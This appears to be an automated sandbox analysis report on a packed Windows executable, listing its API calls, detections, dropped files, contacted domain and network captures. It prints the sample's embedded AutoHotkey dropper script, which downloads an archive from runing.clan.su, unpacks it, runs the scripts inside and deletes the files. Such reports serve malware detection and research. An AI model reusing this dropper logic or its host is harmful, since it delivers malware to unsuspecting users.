Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_0045C7A0 MulDiv,MulDiv,MulDiv,MulDiv,MulDiv,GetDC,SelectObject,GetTextMetricsA,MulDiv,GetSystemMetrics,MulDiv,MulDiv,GetDC,SelectObject,GetTextMetricsA,GetSystemMetrics,GetDC,SelectObject,GetTextMetricsA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,DrawTextA,DrawTextA,GetCharABCWidthsA,MulDiv,GetSystemMetrics,GetSystemMetrics,MulDiv,MulDiv,MulDiv,GetDC,SelectObject,GetTextMetricsA,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetWindowLongA,SendMessageA,SetWindowLongA,CreateWindowExA,CreateWindowExA,CreateWindowExA,CreateWindowExA,GetWindowLongA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,CreateWindowExA,SendMessageA,SendMessageA,CreateWindowExA,SendMessageA,SendMessageA,SendMessageA,MulDiv,MulDiv,MulDiv,MoveWindow,SelectObject,ReleaseDC,SendMessageA,SendMessageA,GetClientRect,SetWindowLongA,SendMessageA,SetWindowLongA,MoveWindow,GetWindowRect,SendMessageA,SetWindowPos,GetWindowRect,MapWindowPoints,InvalidateRect,SetWindowPos,SetWindowPos,	2_2_0045C7A0
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_004392C0 SendMessageA,SendMessageA,SendMessageA,IsWindowVisible,ShowWindow,ShowWindow,IsIconic,ShowWindow,GetForegroundWindow,SetForegroundWindow,SendMessageA,	2_2_004392C0
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00475520 GetWindowThreadProcessId,GetWindowThreadProcessId,GetForegroundWindow,FindWindowA,IsIconic,ShowWindow,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,SetForegroundWindow,SetForegroundWindow,GetForegroundWindow,GetWindow,AttachThreadInput,AttachThreadInput,BringWindowToTop,	2_2_00475520
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_0045F710 GetWindowLongA,GetWindowLongA,GetWindowLongA,__Stoull,__Stoull,SetWindowPos,__Stoull,EnableWindow,__Stoull,__Stoull,__Stoull,MulDiv,MulDiv,__Stoull,MulDiv,MulDiv,IsWindow,SetParent,SetWindowLongA,SetParent,IsWindowVisible,IsIconic,SetWindowLongA,SetWindowLongA,SetWindowPos,InvalidateRect,	2_2_0045F710
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00472CD0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,	2_2_00472CD0
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00435EB0 GetForegroundWindow,IsWindowVisible,GetWindowThreadProcessId,IsZoomed,IsIconic,GetWindowLongA,GetModuleHandleA,GetProcAddress,	2_2_00435EB0
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_0043A180 GetCursorPos,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,WindowFromPoint,EnumChildWindows,EnumChildWindows,GetClassNameA,EnumChildWindows,	2_2_0043A180
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00472C70 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,	2_2_00472C70
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00437340 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,SelectObject,DeleteDC,DeleteObject,GetPixel,ReleaseDC,	2_2_00437340
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_0044F220 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,CreateDCA,GetDC,GetPixel,DeleteDC,ReleaseDC,	2_2_0044F220
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_004669E0 SendMessageA,SendMessageA,SendMessageA,GetWindowLongA,IsWindowVisible,IsIconic,GetFocus,GetWindowRect,SendMessageA,ShowWindow,GetWindowLongA,ShowWindow,EnableWindow,EnableWindow,GetWindowRect,PtInRect,PtInRect,PtInRect,SetFocus,SendMessageA,SendMessageA,SetFocus,InvalidateRect,MapWindowPoints,InvalidateRect,	2_2_004669E0

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Users\user\Desktop\ss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Users\user\Desktop\ss.exe

Queries volume information: C:\PROGRA~2\runings.zip VolumeInformation

Jump to behavior

Contains functionality to query local / system time

Show sources

Source: C:\Users\user\Desktop\ss.exe

Code function: 2_2_00423F40 GlobalUnWire,CloseClipboard,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,GetTickCount,GetSystemTimeAsFileTime,FileTimeToLocalFileTime,__alldiv,

2_2_00423F40

Contains functionality to query windows version

Show sources

Source: C:\Users\user\Desktop\ss.exe

Code function: 2_2_0041271E RtlGetVersion,

2_2_0041271E

Queries the cryptographic machine GUID

Show sources

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious

Simulations

Behavior and APIs

Time	Type	Description
13:55:23	API Interceptor	4x Sleep call for process: ss.exe modified
13:56:11	API Interceptor	1x Sleep call for process: wscript.exe modified

Antivirus Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ss.exe	31%	virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label
2.2.ss.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen
2.0.ss.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen
2.1.ss.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen

Domains

Source	Detection	Scanner	Label	Link
runing.clan.su	2%	virustotal		Browse

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
195.216.243.130	2018-01-10_12-13-23.exe	cb79748ee67032d541a333e053cdf8dd2a3f53bc47855d35381814d75e155050	malicious	Browse	lolkekss.usite.pro/DF2.png
195.216.243.130	ss.exe	a8026a125cd6402e34095da0fe419ed4fbb1edcc80336bb9b3cf2c9e5401ce0b	malicious	Browse	runing.clan.su/runings.zip

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
MASTERTEL-ASMoscowRussiaRU	paid_invoice_doc.pdf	1e393b6ad5c0ee0f3ad112279a5889799fb620dd80d907b8bd23e88fe6f83435	malicious	Browse	195.216.243.155
	2018-01-10_12-13-23.exe	cb79748ee67032d541a333e053cdf8dd2a3f53bc47855d35381814d75e155050	malicious	Browse	195.216.243.130
	ss.exe	a8026a125cd6402e34095da0fe419ed4fbb1edcc80336bb9b3cf2c9e5401ce0b	malicious	Browse	195.216.243.130

Dropped Files

No context

Screenshots

Startup

System is w7_1

ss.exe (PID: 3596 cmdline: 'C:\Users\user\Desktop\ss.exe' MD5: B83E77AE26E3663301648318E38EC1B2)

wscript.exe (PID: 3764 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\ProgramData\start.vbs' MD5: 979D74799EA6C8B8167869A68DF5204A)

cleanup

Created / dropped Files

C:\ProgramData\runings.zip
Process:	C:\Users\user\Desktop\ss.exe
File Type:	HTML document, ASCII text, with very long lines
Size (bytes):	6868
Entropy (8bit):	5.311417081263737
Encrypted:	false
MD5:	92039EF35A7D4B77CF46FCA6401B33C1
SHA1:	C5D06575B974470C71FF0F2493E32C9E7668238C
SHA-256:	67D73BE441C1A7DEE565281EB1CA5AE47B612D6FFC109D2B706A73E0F19F3999
SHA-512:	38325D878501EFAB4738B361C508F5ACE5D56A8CEA1B423A2B718E3AFF9D09D791BB9942C08A9EA4E1447E3B6334B7CC8B205AB7FB9A309EDEE074514D3F3FF1
Malicious:	false
Reputation:	low

C:\ProgramData\start.vbs
Process:	C:\Users\user\Desktop\ss.exe
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	123
Entropy (8bit):	4.834108065762658
Encrypted:	false
MD5:	B9B022474BFDB5DF814922B1EAD71E45
SHA1:	6CC42E94C04B94E5524F74BED4726332846AFAC0
SHA-256:	F5868BE8126450DC59DC6A24DD7A9EEDE0FD02799225CAE409A47EE50312CCAA
SHA-512:	8E1284C43A0D64B36FC89BB66425D2C303E9A2C0F1D784E330B03681713B4F91B51216E791E605163C612E74C3A03D5902DEBB63EC61723BC29F04EF4DDD25DF
Malicious:	false
Reputation:	low

Contacted Domains/Contacted IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
runing.clan.su	195.216.243.130	true	true	2%, virustotal, Browse	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

IP	Country	Flag	ASN	ASN Name	Malicious
8.8.8.8	United States		15169	GOOGLE-GoogleIncUS	false
195.216.243.130	United Kingdom		29226	MASTERTEL-ASMoscowRussiaRU	true

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Entropy (8bit):	7.881366538923817
TrID:	Win32 Executable (generic) a (10002005/4) 99.38% UPX compressed Win32 Executable (30571/9) 0.30% Win32 EXE Yoda's Crypter (26571/9) 0.26% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	ss.exe
File size:	336896
MD5:	b83e77ae26e3663301648318e38ec1b2
SHA1:	2adf8fdbea965ff2237644697e5d3e966760f90c
SHA256:	a8026a125cd6402e34095da0fe419ed4fbb1edcc80336bb9b3cf2c9e5401ce0b
SHA512:	70c5c2e50bd00ad49cf5d7753ed8b43350a047210abd761a7083813a375e9f783b1ca19c86a0b86ebb9730d3a3aebec8450bac433382b36f2a5c91882c2f5aad
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................9.......8.L.......................t.............=.....................Rich............PE..L...A.>W...........

File Icon

Static PE Info

General
Entrypoint:	0x4b6760
Entrypoint Section:	UPX1
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x573EA441 [Fri May 20 05:44:33 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	2dead38317347de812f33c5e69b985ff

Entrypoint Preview

Instruction
pushad
mov esi, 00469000h
lea edi, dword ptr [esi-00068000h]
push edi
jmp 00007F62148662CDh
nop
mov al, byte ptr [esi]
inc esi
mov byte ptr [edi], al
inc edi
add ebx, ebx
jne 00007F62148662C9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F62148662AFh
mov eax, 00000001h
add ebx, ebx
jne 00007F62148662C9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
add ebx, ebx
jnc 00007F62148662CDh
jne 00007F62148662EAh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F62148662E1h
dec eax
add ebx, ebx
jne 00007F62148662C9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
jmp 00007F6214866296h
add ebx, ebx
jne 00007F62148662C9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
jmp 00007F6214866314h
xor ecx, ecx
sub eax, 03h
jc 00007F62148662D3h
shl eax, 08h
mov al, byte ptr [esi]
inc esi
xor eax, FFFFFFFFh
je 00007F6214866337h
sar eax, 1
mov ebp, eax
jmp 00007F62148662CDh
add ebx, ebx
jne 00007F62148662C9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F621486628Eh
inc ecx
add ebx, ebx
jne 00007F62148662C9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F6214866280h
add ebx, ebx
jne 00007F62148662C9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
add ebx, ebx
jnc 00007F62148662B1h
jne 00007F62148662CBh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jnc 00007F62148662A6h
add ecx, 02h
cmp ebp, FFFFFB00h
adc ecx, 02h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbb260	0x300	.rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb7000	0x4260	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
UPX0	0x1000	0x68000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
UPX1	0x69000	0x4e000	0x4da00	False	0.994250704509	data	7.92177156162	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xb7000	0x5000	0x4600	False	0.22265625	data	5.14253585569	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0xb72e0	0x25a8	data
RT_ICON	0xb988c	0x10a8	data
RT_ICON	0xba938	0x468	GLS_BINARY_LSB_FIRST
RT_MENU	0xb2d94	0x2c8	data	English	United States
RT_DIALOG	0xb305c	0xe8	data	English	United States
RT_ACCELERATOR	0xb3144	0x48	data	English	United States
RT_RCDATA	0xb318c	0x309	data	English	United States
RT_RCDATA	0xb3498	0x7b	data	English	United States
RT_GROUP_ICON	0xbada4	0x30	MS Windows icon resource - 3 icons, 48x48, 256-colors
RT_MANIFEST	0xbadd8	0x487	ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.DLL	LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ADVAPI32.dll	RegCloseKey
COMCTL32.dll
COMDLG32.dll	GetOpenFileNameA
GDI32.dll	BitBlt
ole32.dll	CoGetObject
OLEAUT32.dll	SysStringLen
PSAPI.DLL	GetModuleBaseNameA
SHELL32.dll	DragFinish
USER32.dll	GetDC
VERSION.dll	VerQueryValueA
WINMM.dll	mixerOpen
WSOCK32.dll	WSAStartup

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Static AutoHotKey Info

General

Code:

; <COMPILER: v1.1.23.07> #SingleInstance force #NoTrayIcon Sleep, 22000 FileInstall, D:\start.vbs, C:\ProgramData\start.vbs Sleep, 5000 UrlDownloadToFile, http://runing.clan.su/runings.zip, C:\ProgramData\runings.zip Sleep, 4000 FileDelete, C:\ProgramData\runings.exe Sleep, 3000 ArcPath = C:\ProgramData\runings.zip OutPath = C:\ProgramData\ Shell := ComObjCreate("Shell.Application") Items := Shell.NameSpace(ArcPath).Items Items.Filter(73952, "*") Shell.NameSpace(OutPath).CopyHere(Items, 16) Sleep, 4000 FileDelete, C:\ProgramData\runings.zip Sleep, 5000 Run, C:\ProgramData\start.vbs,, UseErrorLevel Sleep, 70000 FileDelete, C:\ProgramData\runings.exe FileDelete, C:\ProgramData\start.vbs Sleep, 2000 Run, C:\Users\Public\Videos\up.vbs,, UseErrorLevel Sleep, 1000 ExitApp

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/03/18-13:55:57.375675	TCP	2008259	ET TROJAN Suspicious User-Agent (AutoHotkey)	49188	80	192.168.1.16	195.216.243.130

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 3, 2018 13:55:57.063105106 CEST	56975	53	192.168.1.16	8.8.8.8
Apr 3, 2018 13:55:57.265172958 CEST	53	56975	8.8.8.8	192.168.1.16
Apr 3, 2018 13:55:57.373440027 CEST	49188	80	192.168.1.16	195.216.243.130
Apr 3, 2018 13:55:57.373486042 CEST	80	49188	195.216.243.130	192.168.1.16
Apr 3, 2018 13:55:57.375061989 CEST	49188	80	192.168.1.16	195.216.243.130
Apr 3, 2018 13:55:57.375674963 CEST	49188	80	192.168.1.16	195.216.243.130
Apr 3, 2018 13:55:57.375695944 CEST	80	49188	195.216.243.130	192.168.1.16
Apr 3, 2018 13:56:00.171808958 CEST	80	49188	195.216.243.130	192.168.1.16
Apr 3, 2018 13:56:00.171840906 CEST	80	49188	195.216.243.130	192.168.1.16
Apr 3, 2018 13:56:00.171880960 CEST	80	49188	195.216.243.130	192.168.1.16
Apr 3, 2018 13:56:00.171987057 CEST	80	49188	195.216.243.130	192.168.1.16
Apr 3, 2018 13:56:00.172004938 CEST	80	49188	195.216.243.130	192.168.1.16
Apr 3, 2018 13:56:00.172058105 CEST	49188	80	192.168.1.16	195.216.243.130
Apr 3, 2018 13:56:00.172102928 CEST	80	49188	195.216.243.130	192.168.1.16
Apr 3, 2018 13:56:00.174196005 CEST	49188	80	192.168.1.16	195.216.243.130
Apr 3, 2018 13:56:00.270538092 CEST	80	49188	195.216.243.130	192.168.1.16
Apr 3, 2018 13:56:00.270646095 CEST	49188	80	192.168.1.16	195.216.243.130
Apr 3, 2018 13:56:15.160710096 CEST	80	49188	195.216.243.130	192.168.1.16
Apr 3, 2018 13:56:15.160947084 CEST	49188	80	192.168.1.16	195.216.243.130
Apr 3, 2018 13:57:32.611829996 CEST	49188	80	192.168.1.16	195.216.243.130

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 3, 2018 13:55:57.063105106 CEST	56975	53	192.168.1.16	8.8.8.8
Apr 3, 2018 13:55:57.265172958 CEST	53	56975	8.8.8.8	192.168.1.16

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 3, 2018 13:55:57.063105106 CEST	192.168.1.16	8.8.8.8	0x645a	Standard query (0)	runing.clan.su	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Replay Code	Name	CName	Address	Type	Class
Apr 3, 2018 13:55:57.265172958 CEST	8.8.8.8	192.168.1.16	0x645a	No error (0)	runing.clan.su		195.216.243.130	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

runing.clan.su

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.1.16	49188	195.216.243.130	80	C:\Users\user\Desktop\ss.exe

Timestamp	kBytes transferred	Direction	Data
Apr 3, 2018 13:55:57.375674963 CEST	0	OUT	GET /runings.zip HTTP/1.1 User-Agent: AutoHotkey Host: runing.clan.su Cache-Control: no-cache
Apr 3, 2018 13:56:00.171808958 CEST	2	IN	HTTP/1.1 404 Not Found Server: nginx/1.8.0 Date: Tue, 03 Apr 2018 11:56:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=15 Data Raw: 31 61 64 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 54 54 50 20 34 30 34 20 52 65 73 6f 75 72 63 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 20 66 6f 6e 74 3a 20 31 32 70 78 2f 32 32 70 78 20 27 56 65 72 64 61 6e 61 27 3b 20 63 6f 6c 6f 72 3a 20 23 36 38 36 38 36 38 3b 7d 0a 62 6f 64 79 20 61 20 7b 63 6f 6c 6f 72 3a 20 23 33 32 61 32 63 66 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 7d 0a 62 6f 64 79 20 61 3a 68 6f 76 65 72 20 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 7d 0a 74 64 2c 20 69 6e 70 75 74 2c 20 73 65 6c 65 63 74 2c 20 74 65 78 74 61 72 65 61 20 7b 66 6f 6e 74 3a 20 31 32 70 78 20 2f 32 32 70 78 20 27 56 65 72 64 61 6e 61 27 3b 20 63 6f 6c 6f 72 3a 20 23 36 38 36 38 36 38 3b 7d 0a 2e 63 6c 65 61 72 20 7b 63 6c 65 61 72 3a 20 62 6f 74 68 3b 7d 0a 2e 63 6f 6e 74 65 6e 74 20 7b 77 69 64 74 68 3a 20 37 33 35 70 78 3b 20 6d 61 72 67 69 6e 3a 20 61 75 74 6f 3b 7d 0a 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 68 65 61 64 65 72 2d 2d 2d 2d 2d 2d 2a 2f 0a 23 68 65 61 64 65 72 20 7b 68 65 69 67 68 74 3a 20 35 35 70 78 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 2f 2e 73 2f 69 6d 67 2f 65 72 72 2f 34 30 34 2d 68 65 61 64 65 72 2d 6c 69 6e 65 2e 67 69 66 29 20 72 65 70 65 61 74 2d 78 20 30 20 34 30 70 78 3b 7d 0a 23 6c 6f 67 6f 20 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 32 36 70 78 20 30 20 30 20 30 3b 20 77 69 64 74 68 3a 20 34 33 70 78 3b 20 68 65 69 67 68 74 3a 20 32 37 70 78 3b 7d 0a 23 6c 6f 67 6f 20 61 20 7b 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 70 61 64 64 69 6e 67 3a 20 30 20 39 70 78 3b 20 77 69 64 74 68 3a 20 34 33 70 78 3b 20 68 65 69 67 68 74 3a 20 32 37 70 78 3b 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 20 6f 75 74 6c 69 6e 65 3a 20 6e 6f 6e 65 3b 20 74 65 78 74 2d 69 6e 64 65 6e 74 3a 20 2d 39 39 39 39 70 78 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 20 75 72 6c 28 2f 2e 73 2f 69 6d 67 2f 65 72 72 2f 34 30 34 2d 6c 6f 67 6f 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 63 65 6e 74 65 72 3b 7d 0a 2e 73 69 74 65 2d 63 72 65 61 74 65 20 7b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 6d 61 72 67 69 6e 3a 20 32 36 70 78 20 30 20 30 20 30 3b 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 70 61 64 64 69 6e 67 3a 20 30 20 35 70 78 20 30 20 31 35 70 78 3b 20 66 6f 6e 74 3a 20 31 31 70 78 2f 32 36 70 78 20 27 56 65 72 64 61 6e 61 27 3b 20 63 6f 6c 6f 72 3a 20 23 36 37 63 30 65 32 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 20 75 72 6c 28 2f 2e 73 2f 69 6d 67 2f 65 72 72 2f 34 30 34 2d 61 72 72 6f 77 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 20 31 30 70 78 3b 7d 0a 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2a 2f 0a 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 6d 61 69 6e 2d 2d 2d 2d 2d 2d 2d 2d 2a 2f 0a 23 6d 61 69 6e 20 7b 70 61 64 64 69 6e 67 3a 20 35 30 70 78 20 30 20 35 35 70 78 20 30 3b 7d 0a 2e 6d 61 69 6e 2d 6c 65 66 74 20 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 20 77 69 64 74 68 3a 20 31 36 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0a 2e 65 72 72 6f 72 74 69 74 6c 65 20 7b 66 6f 6e 74 3a 20 31 38 70 78 2f 32 34 70 78 20 Data Ascii: 1ad4<!DOCTYPE html><html><head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <title>HTTP 404 Resource not found</title><style type="text/css">body {margin: 0; padding: 0; background: #fff; font: 12px/22px 'Verdana'; color: #686868;}body a {color: #32a2cf; text-decoration: underline;}body a:hover {text-decoration: none;}td, input, select, textarea {font: 12px /22px 'Verdana'; color: #686868;}.clear {clear: both;}.content {width: 735px; margin: auto;}/--------header------/#header {height: 55px; background: url(/.s/img/err/404-header-line.gif) repeat-x 0 40px;}#logo {float: left; margin: 0; padding: 26px 0 0 0; width: 43px; height: 27px;}#logo a {display: block; padding: 0 9px; width: 43px; height: 27px; overflow: hidden; outline: none; text-indent: -9999px; background: #fff url(/.s/img/err/404-logo.png) no-repeat center center;}.site-create {float: right; margin: 26px 0 0 0; display: block; padding: 0 5px 0 15px; font: 11px/26px 'Verdana'; color: #67c0e2; background: #fff url(/.s/img/err/404-arrow.png) no-repeat left 10px;}/--------------------//--------main--------/#main {padding: 50px 0 55px 0;}.main-left {float: left; width: 160px; text-align: center;}.errortitle {font: 18px/24px
Apr 3, 2018 13:56:00.171840906 CEST	3	IN	Data Raw: 27 56 65 72 64 61 6e 61 27 3b 20 63 6f 6c 6f 72 3a 20 23 37 65 62 34 64 32 3b 7d 0a 2e 65 72 72 6f 72 63 6f 64 65 20 7b 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 32 35 70 78 20 30 3b 20 77 69 64 74 68 3a 20 31 35 35 70 78 3b 20 68 65 69 67 68 Data Ascii: 'Verdana'; color: #7eb4d2;}.errorcode {margin: 10px 0 25px 0; width: 155px; height: 66px; background: url(/.s/img/err/404.png) no-repeat;}.pagenotfound {font: 14px/20px 'Verdana'; color: #7e7e7e;}.pagenotfound a {text-transform: uppercase;
Apr 3, 2018 13:56:00.171880960 CEST	3	IN	Data Raw: 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 7d 0a 2e 66 6f 6f 74 65 72 2d 63 6f 6c 20 6c 69 20 61 3a 68 6f 76 65 72 20 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 7d 0a 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d Data Ascii: ation: none;}.footer-col li a:hover {text-decoration: underline;}/--------------------/</style></head><body><script type="text/javascript"> var _gaq = _gaq \|\|
